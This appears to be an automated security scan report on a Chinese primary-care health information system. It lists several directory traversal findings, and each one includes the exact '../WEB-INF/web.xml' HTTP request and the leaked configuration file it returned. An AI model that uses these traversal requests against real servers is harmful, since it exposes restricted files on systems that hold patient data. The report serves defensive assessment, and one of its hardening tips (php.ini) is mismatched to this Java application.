Primary-level Medical and Health Information System (基層醫療衛生信息系統) (3)
http://10.8.3.187:9001/phis/ Web Application Security Test Report
TideSec Security Team, 12 August 2020

1. Assessment Overview

Target of this assessment:
  Website URL: http://10.8.3.187:9001/phis/
  Website title: 基層醫療衛生信息系統 (Primary-level Medical and Health Information System)
  IP address: Error

Web security scan results:
  High-risk vulnerabilities: 18
  Medium-risk vulnerabilities: 6
  Low-risk vulnerabilities: 0

Page security check results:
  Total URLs: 52
  Dynamic URLs: 1
  Hidden-link pages:
  Sensitive-word pages:
  Broken-link pages:
  Snapshot pages:

Information leakage test results:
  Open ports: Error
  Subdomains: 1
  Sensitive information: 0

2. About WDScanner

In recent years, as security vulnerabilities across the Internet have intensified, high-risk vulnerabilities such as the OpenSSL Heartbleed vulnerability, Java deserialization vulnerabilities, Struts command execution vulnerabilities and ImageMagick command execution vulnerabilities have broken out frequently. Against this background, in order to build detection capability quickly after a vulnerability is disclosed and to perform comprehensive, fast security checks on websites and hosts, the TideSec security team developed the distributed web security monitoring platform WDScanner. The WDScanner platform mainly provides the following functions: distributed web vulnerability scanning, customer management, scheduled vulnerability scanning, website crawling, hidden-link detection, website fingerprinting, targeted vulnerability detection, proxy collection and deployment, targeted password cracking, and social-engineering database lookup.

(Preceding finding, continued)

HTTP request:
  GET /phis/resources/phis/css/images/../../../WEB-INF/web.xml? HTTP/1.1
  Host: 10.8.3.187:9001
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
  Accept: */*

Hardening suggestions:
  - Filter "." (dot) and other potentially malicious characters: this applies when the production code can be modified and is the most recommended method.
  - Use a regular expression to check the format of user-supplied parameters and verify that the input format is legal: this method gives the most accurate and fine-grained matching, but it is difficult and requires a lot of time to configure the rules.
  - Configure open_basedir in php.ini: this parameter restricts the directories the user may access and serves as a fallback when the production code cannot be modified.

4.4 Directory Traversal Vulnerability

Description: This script may be vulnerable to directory traversal attacks. Directory traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.
Risk level: High
File path: /phis/resources/sencha/ext3/css
Risk parameter:
Test details: This file was found using the pattern $dirName/../../../WEB-INF/web.xml?. Original directory: /phis/resources/sencha/ext3/css. Directory traversal pattern found:

  <web-app xmlns="http://java.sun.com/xml/ns/javaee"
           xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
           xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"
           version="2.5">
    <context-param>
      <param-name>webAppRootKey</param-name>
      <param-value>phis.root</param-value>
    </context-param>
    <context-param>
      <param-name>log4jConfigLocation</param-name>
      <param-value>classpath:phis/spring/log4j.properties</param-value>
    </context-param>
    <context-param>
      <param-name>log4jRefreshInterval</param-name>
      <param-value>6000</param-value>
    </context-param>
    <listener>
      <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
    </listener>
    <listener>
      <listener-class>ctd.mvc.controller.util.MVCSessionListener</listener-class>
    </listener>
    <servlet>
      <servlet-name>springServlet</servlet-name>
      <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
      <init-param>
        <param-name>contextConfigLocation</param-name>
        <param-value>classpath:ctd/mvc/controller/spring-mvc.xml classpath:phis/spring/spring.xml <!-- classpath:ctd/net/rpc/subscribe/store/spring-metaq.xml --></param-value>
      </init-param>
      <load-on-startup>1</load-on-startup>
    </servlet>
    <servlet-mapping>
      <servlet-name>springServlet</servlet-name>
      <url-pattern>/</url-pattern>
    </servlet-mapping>
    <servlet>
      <servlet-name>rpcServer</servlet-name>
      <servlet-class>com.caucho.hessian.server.HessianServlet</servlet-class>
      <init-param>
        <param-name>home-class</param-name>
        <param-value>ctd.net.rpc.server.HessianServiceDispather</param-value>
      </init-param>
    </servlet>
    <servlet-mapping>
      <servlet-name>rpcServer</servlet-name>
      <url-pattern>/rpc/*</url-pattern>
    </servlet-mapping>
    <!--
    <servlet>
      <servlet-name>AuthorizationServlet</servlet-name>
      <servlet-class>ctd.oauth.AuthorizationCostom</servlet-class>
    </servlet>
    <servlet>
      <servlet-name>AuthLogon</servlet-name>
      <servlet-class>ctd.oauth.AuthLogon</servlet-class>
    </servlet>
    <servlet-mappings>
      <servlet-name>AuthorizationServlet</servlet-name>
      <url-pattern>/oauth/authorize</url-pattern>
    </servlet-mappings>
    <servlet-mappings>
      <servlet-name>AuthLogon</servlet-name>
      <url-pattern>/oauth/authorize_logon</url-pattern>
    </servlet-mappings>
    -->
    <servlet>
      <servlet-name>HttpForward</servlet-name>
      <servlet-class>phis.source.controller.HttpControllerForward</servlet-class>
    </servlet>
    <servlet-mapping>
      <servlet-name>HttpForward</servlet-name>
      <url-pattern>/forward/*</url-pattern>
    </servlet-mapping>
  </web-app>

HTTP request:
  GET /phis/resources/sencha/ext3/css/../../../WEB-INF/web.xml? HTTP/1.1
  Host: 10.8.3.187:9001
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
  Accept: */*

Hardening suggestions: as given above (filter "." and other potentially malicious characters; validate parameter format with a regular expression; configure open_basedir in php.ini as a fallback when the production code cannot be modified).

4.5 Directory Traversal Vulnerability

Description: same as 4.4.
Risk level: High
File path: /phis/resources/app
Risk parameter:
Test details: This file was found using the pattern $dirName/../WEB-INF/web.xml?. Original directory: /phis/resources/app. Directory traversal pattern found: the same web.xml content as in 4.4.

HTTP request:
  GET /phis/resources/app/../WEB-INF/web.xml? HTTP/1.1
  (remaining headers as in 4.4)

Hardening suggestions: same as 4.4.

4.6 Directory Traversal Vulnerability

Description: same as 4.4.
Risk level: High
File path: /phis/resources/element
Risk parameter:
Test details: This file was found using the pattern $dirName/../WEB-INF/web.xml?. Original directory: /phis/resources/element. Directory traversal pattern found: the same web.xml content as in 4.4.

HTTP request:
  GET /phis/resources/element/../WEB-INF/web.xml? HTTP/1.1
  (remaining headers as in 4.4)

Hardening suggestions: same as 4.4.

4.7 Directory Traversal Vulnerability

Description: same as 4.4.
Risk level: High
File path: /phis/resources/phis
Risk parameter:
Test details: This file was found using the pattern $dirName/../WEB-INF/web.xml?. Original directory: /phis/resources/phis. Directory traversal pattern found: the same web.xml content as in 4.4.

HTTP request:
  GET /phis/resources/phis/../WEB-INF/web.xml? HTTP/1.1
  (remaining headers as in 4.4)

Hardening suggestions: same as 4.4.

4.8 Directory Traversal Vulnerability

Description: same as 4.4.
Risk level: High
File path: /phis/resources/app/desktop
Risk parameter:
Test details: This file was found using the pattern $dirName/../../WEB-INF/web.xml?. Original directory: /phis/resources/app/desktop. Directory traversal pattern found: the same web.xml content as in 4.4.

HTTP request:
  GET /phis/resources/app/desktop/../../WEB-INF/web.xml? HTTP/1.1
  (remaining headers as in 4.4)

Hardening suggestions: same as 4.4.

4.9 Directory Traversal Vulnerability

Description: same as 4.4.
Risk level: High
File path: /phis/resources
Risk parameter:
Test details: This file was found using the pattern $dirName/../WEB-INF/web.xml?. Original directory: /phis/resources. Directory traversal pattern found: the same web.xml content as in 4.4 (the report text breaks off at this point).